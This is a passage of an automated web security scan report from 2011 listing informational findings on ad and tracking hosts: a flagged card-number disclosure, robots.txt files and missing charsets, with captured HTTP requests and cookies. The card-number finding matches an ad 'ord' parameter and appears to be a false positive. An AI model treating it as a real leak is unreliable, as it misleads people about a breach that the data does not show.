.swf?clickTAG=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
6b72&clickTag=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
b72&clickTag1=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
rs=\"clickTAG=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
6b72&clickTag=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
b72&clickTag1=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
.swf?clickTAG=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
6b72&clickTag=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
b72&clickTag1=http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...
<a href=\"http://www30a2.glam.com/gad/click.act?0339-_gclickid=gaclk4df5f0d4b7ef9-_advid=50002325-_adid=5000042624-_crid=500030953-_aipid=201106130402-_ge_=1^2^7d90fa6f3101c8fade5f2bf750f33a43-ord=4654773336369544-afid=1000212071-dsid=864279-sz=728x90-zone=/-sid=115232130551023312111-tile=2-seq=1-tt=j-atf=0-url=00l3it-flg=64-u=b0032g2reou1ssci1k9,f0f02sa,g10001s-_gclick_gaclk4df5f0d4b7ef9http://altfarm.mediaple
...[SNIP]...

23.2. http://www35.glam.com/gad/glamadapt_jsrv.act previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www35.glam.com
Path:	/gad/glamadapt_jsrv.act

Issue detail

The following credit card number was disclosed in the response:

4654773336369544

Request

GET /gad/glamadapt_jsrv.act?;flg=64;;zone=/;nt=b;cc=us;aft=p;ec=ron;p=0;p=1;!c=nae;!c=s;!c=sf;al=walmartdv;ec=tsp;ia=mf;jpbrash=admax;pec=sp;psh=y;rmt=exp;vec=sp;vpec=sp;ct=pacsun;ct=xboxk3905;qc=D;qc=T;qc=5150;qc=3726;qc=2951;qc=2705;qc=2698;qc=2695;qc=2693;qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,160x600:1;uv=10;;tt=j;u=b0011g2reou1ssci1k9,f0f02sa,g10001s;sz=160x600,120x600;tile=1;ord=4654773336369544;;afid=1000212071;dsid=864279;url=00l3it;seq=1;ux=f-f02sa,tid-1,pid-g2reou1ssci1k9,aid-1,g-64,1,;_glt=300:1:6:13:13:573:2011:6:13;a_tz=-300;_g_cv=2; HTTP/1.1
Host: www35.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/aboutcontact-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905; bkpix2=1; qcsegs=D,T,5150,3726,2951,2705,2698,2695,2693,2692,2690,1771

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: application/x-javascript
ETag: "d398cadfb255eaeb5658516ed12d9db3:1307759730"
X-Glam-Bdata: XGlamBData,nbt,ls,rs
X-Glam-AdId: 5000036879
X-Glam-Euid: 09bdd73895bd3803918767154e79d853
X-Powered-By: GlamAdapt/ASE/1.5
Vary: Accept-Encoding
Expires: Mon, 13 Jun 2011 11:13:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 13 Jun 2011 11:13:14 GMT
Content-Length: 5753
Connection: close

...[SNIP]...
qc=2692;qc=2690;qc=1771;atf=0;pfl=3;dt=s;!c=hagl;!c=hagn;pt=0;afid=1000212071;dsid=864279;pt=sk;gsz=888x11:999,160x600:1;uv=10;;tt=j;u=b0011g2reou1ssci1k9,f0f02sa,g10001s;sz=160x600,120x600;tile=1;ord=4654773336369544;;afid=1000212071;dsid=864279;url=00l3it;seq=1;ux=f-f02sa,tid-1,pid-g2reou1ssci1k9,aid-1,g-64,1,;_glt=300:1:6:13:13:573:2011:6:13;a_tz=-300;_g_cv=2;;';
var vars = glam_affiliate_vars.split(";");
fo
...[SNIP]...

24. Robots.txt file previous next
There are 11 instances of this issue:

http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11
http://d.xp1.ru4.com/meta
http://l.addthiscdn.com/live/t00/250lo.gif
http://load.exelator.com/load/
http://m.xp1.ru4.com/meta
http://matrix.hbo.com/b/ss/hboprod/1/H.20.3/s76848129960708
http://s.media-imdb.com/twilight/
http://segment-pixel.invitemedia.com/unpixel
http://server.cpmstar.com/brilig.aspx
http://vt.imiclk.com/cgi/vtc.cgi
http://www.mavgear.com/adaptive.php

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

24.1. http://altfarm.mediaplex.com/ad/js/17038-128465-20406-11 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17038-128465-20406-11

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"26-1289502470000"
Last-Modified: Thu, 11 Nov 2010 19:07:50 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 13 Jun 2011 11:19:29 GMT
Connection: keep-alive

User-agent: *
Disallow: /

24.2. http://d.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/meta

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 13 Jun 2011 11:09:10 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/plain
Last-modified: Fri, 31 Jul 2009 18:32:10 GMT
Content-length: 26
Etag: "1a-4a7338aa"
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /

24.3. http://l.addthiscdn.com/live/t00/250lo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.addthiscdn.com
Path:	/live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 May 2011 11:04:31 GMT
ETag: "d099d3-1b-4a4038d666dc0"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 13 Jun 2011 11:20:39 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

24.4. http://load.exelator.com/load/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://load.exelator.com
Path:	/load/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-846701673"
Last-Modified: Tue, 15 Apr 2008 16:21:01 GMT
Content-Length: 27
Date: Mon, 13 Jun 2011 11:08:21 GMT
Server: HTTP server

User-agent: *
Disallow: /

24.5. http://m.xp1.ru4.com/meta previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/meta

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.xp1.ru4.com

Response

24.6. http://matrix.hbo.com/b/ss/hboprod/1/H.20.3/s76848129960708 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matrix.hbo.com
Path:	/b/ss/hboprod/1/H.20.3/s76848129960708

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: matrix.hbo.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:18 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "27514a-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www301
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

24.7. http://s.media-imdb.com/twilight/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.media-imdb.com
Path:	/twilight/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s.media-imdb.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:24:20 GMT
Server: Server
Last-Modified: Sun, 12 Jun 2011 05:36:33 GMT
ETag: "1512-4df45061"
Accept-Ranges: bytes
Content-Length: 5394
Cneonction: close
Content-Type: text/plain
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://i.imdb.com/images/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
Connection: close

# robots.txt for IMDb properties
# [ images/legacy/robots.txt ]
#
User-agent: Slurp
Crawl-delay: 0.2
Disallow: /tvschedule
Disallow: /ActorSearch
Disallow: /ActressSearch
Disallow: /AddRecommendation

...[SNIP]...

24.8. http://segment-pixel.invitemedia.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/unpixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 13 Jun 2011 11:16:03 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

24.9. http://server.cpmstar.com/brilig.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://server.cpmstar.com
Path:	/brilig.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: server.cpmstar.com

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/plain
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Last-Modified: Tue, 01 Feb 2011 16:47:17 GMT
Accept-Ranges: bytes
ETag: "637dcdaf2fc2cb1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADM DEVa PSAa PSDa OUR OTR IND UNI NAV STA"
Date: Mon, 13 Jun 2011 11:25:26 GMT
Content-Length: 28
Connection: close
Via: 1.1 AN-AMP_TM uproxy-2

User-agent: *
Disallow: /

24.10. http://vt.imiclk.com/cgi/vtc.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://vt.imiclk.com
Path:	/cgi/vtc.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: vt.imiclk.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 22 Mar 2011 15:15:58 GMT
ETag: "40406c-1a-49f13b8a72780"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Mon, 13 Jun 2011 11:19:26 GMT
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

User-agent: *
Disallow: /

24.11. http://www.mavgear.com/adaptive.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mavgear.com
Path:	/adaptive.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mavgear.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:20:58 GMT
Server: Apache/2.2.17 (Atomic)
Last-Modified: Thu, 30 Sep 2010 22:28:40 GMT
ETag: "66a2760-48-49181998ff600"
Accept-Ranges: bytes
Content-Length: 72
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Sitemap: http://www.mavgear.com/xml_sitemap.xml

25. HTML does not specify charset previous next
There are 71 instances of this issue:

http://ad.doubleclick.net/adi/N1558.NetMining/B5527925
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5
http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8
http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7
http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3
http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27
http://ad.doubleclick.net/adi/N553.Glam/B5345813.2
http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8
http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7
http://ad.doubleclick.net/adi/amzn.us.audienceextension/
http://ad.doubleclick.net/adi/x1.dt/dt2
http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt
http://ad.doubleclick.net/pfadx/fansided_cim/
http://ad.yieldmanager.com/iframe3
http://adserver.veruta.com/cookiematch.fcgi
http://amch.questionmarket.com/adscgen/st.php
http://bidnw.ru4.com/nf
http://bn.xp1.ru4.com/nf
http://bpx.a9.com/amzn/iframe.html
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://cdn-bpx.a9.com/amzn/iframe.html
http://cdn.apture.com/media/html/aptureLoadIframe.html
http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html
http://creativeby1.unicast.com/script/V3.00/deliver2.html
http://d13.zedo.com/OzoDB/cutils/R53_5_5/jsc/1190/zpu.html
http://d3.zedo.com/jsc/d3/ff2.html
http://d3l3lkinz3f56t.cloudfront.net/dclk1-0.9.html
http://data.nba.com/data/html/gdyn/gdyn_nba.html
http://ds.addthis.com/red/psi/sites/idolator.com/p.json
http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest.php
http://dyn-cache.kotaku.com/static/sidebar/kotaku.com/latest/1307750400.php
http://fls.doubleclick.net/activityi
http://idolator.com/wp-content/plugins/wp-facebookconnect/xd_receiver.php
http://js.adsonar.com/js/pass.html
http://kotaku.com/static/items/kotaku.com/trackers.html
http://mediacdn.disqus.com/1307735099/build/system/def.html
http://mediacdn.disqus.com/1307735099/build/system/reply.html
http://ping.chartbeat.net/ping
http://pixel.invitemedia.com/data_sync
http://platform0.twitter.com/widgets/follow_button.html
http://ptimeinc.chartbeat.net/ping
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://static.ny.us.criteo.net/empty.html
http://stats.townnews.com/thesouthern.com/
http://subscription-assets.time.com/prod/assets/themes/magazines/SUBS/templates/velocity/site/td-300x100bluepartofie/continue-ofie.html
http://tags.bluekai.com/site/2312
http://thesouthern.com/app/port/bulkCommentCount.php
http://thesouthern.com/app/port/tabMostCommentedJs.php
http://w55c.net/ct/cms-2-frame.html
http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/14683/NF/RETURN-CODE/JS/
http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp
http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp
http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp
http://www.hbo.com/favicon.ico
http://www.imdb.com/images/SF8dcd77f70a5de2a050e47b985a4dfa00/a/js/scriptloader.html
http://www.imdb.com/images/SF99c7f777fc74f1d954417f99b985a4af/a/ifb/doubleclick/expand.html
http://www.imdb.com/images/a/ifb/google_afc_labs.html
http://www.imdb.com/images/a/ifb/pda_comm2.html
http://www.imdb.com/title/tt0944947/_ajax/footer
http://www.mtv.com/global/music/modules/followUs/js/index.jhtml
http://www.mtv.com/global/music/modules/rssPartner/js/index.jhtml
http://www.mtv.com/sitewide/modules/footer/brandFooter/js/index.jhtml
http://www.mtv.com/sitewide/modules/footer/js/index.jhtml
http://www.mtv.com/sitewide/modules/header/mtv/js/index.jhtml
http://www.nba.com/mavericks/
http://www.nba.com/video/cvp/teamarticleplayer.html
http://www.oneregion.com/app/calendar/events/js/calWidget.php
http://www.paperg.com/jsfb/embed.php
http://www.ugo.com/takeover/takeover.html
http://www.ugo.com/xd_receiver.htm

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

25.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5527925 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N1558.NetMining/B5527925

Request

Response

25.2. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.5;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BxBFZpP_1TbyHBMPhlQex0pyMCafwhJkCr6v7qTXH3I3nWNCgngIQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEJNzI4eDkwX2FzyAEJ2gEgaHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXO4AhjAAgXIAtfnvB-oAwHRA-DL25fwCQph6AOIAugDtQj1AwAAAMA&num=1&sig=AGiWqtxV29F3NdCJWLxuSilo3gOKcRXhzw&client=ca-pub-7494156027018342&adurl=;ord=1123029870? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307985395&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307967395234&bpp=3&shv=r20110608&jsv=r20110607&correlator=1307967395282&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1840987920&ga_fc=1&u_tz=-300&u_his=16&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=1&dtd=93&xpc=Qu02yK2fdQ&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

25.3. http://ad.doubleclick.net/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8

Request

GET /adi/N2436.150781.B3_GOOGLENETWORK/B5578200.8;sz=300x250;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=B0RX83fT1TYelF4_6lAfYna2LCqfwhJkC36X7qTXH3I3nWICD-QEQARgBIJConBM4AFDvkOvV_v____8BYMnW8obIo_wasgEPd3d3LnR3YWNrbGUuY29tugEKMzAweDI1MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVz4AECuAIYwAIFyALX57wfqAMB0QPgy9uX8AkKYegDiALoA7UI9QMAAADE&num=1&sig=AGiWqtxAYnyItqIgOuFXpr8Jc_kU5dLbrQ&client=ca-pub-7494156027018342&adurl=;ord=1392015523? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=250&slotname=0180034002&w=300&lmt=1307982636&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964636320&bpp=2&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054&correlator=1307964636348&frm=4&adk=44878673&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1076203117&ga_fc=1&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=2&dtd=542&xpc=l1rYcbW4k3&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

25.4. http://ad.doubleclick.net/adi/N2998.specificmedia.com/B5470646.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.specificmedia.com/B5470646.7

Request

Response

25.5. http://ad.doubleclick.net/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.2630.AKAMAITECHNOLOGIES/B4852598.3

Request

Response

25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N447.153730.YAHOO.COM/B5548365.27

Request

Response

25.7. http://ad.doubleclick.net/adi/N553.Glam/B5345813.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.Glam/B5345813.2

Request

Response

25.8. http://ad.doubleclick.net/adi/N553.expedia.com/B5280302.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.expedia.com/B5280302.8

Request

Response

25.9. http://ad.doubleclick.net/adi/N6090.218.9105273493621/B5528573.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6090.218.9105273493621/B5528573.7

Request

Response

25.10. http://ad.doubleclick.net/adi/amzn.us.audienceextension/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/amzn.us.audienceextension/

Request

Response

25.11. http://ad.doubleclick.net/adi/x1.dt/dt2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.dt/dt2

Request

Response

25.12. http://ad.doubleclick.net/adi/x1.rtb/fingerhut/mass/rmkt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/x1.rtb/fingerhut/mass/rmkt

Request

GET /adi/x1.rtb/fingerhut/mass/rmkt;sz=728x90;click=http://bidnw.ru4.com/bclick?_f=7adc4d0e-99d0-4a16-b666-c08ba65acd86&_o=15607&_eo=52787&_et=1307962892&_a=18121040&_s=0&_d=18123636&_pm=52787&_pn=18123865&redirect=;u=18123865;ord=5047475? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
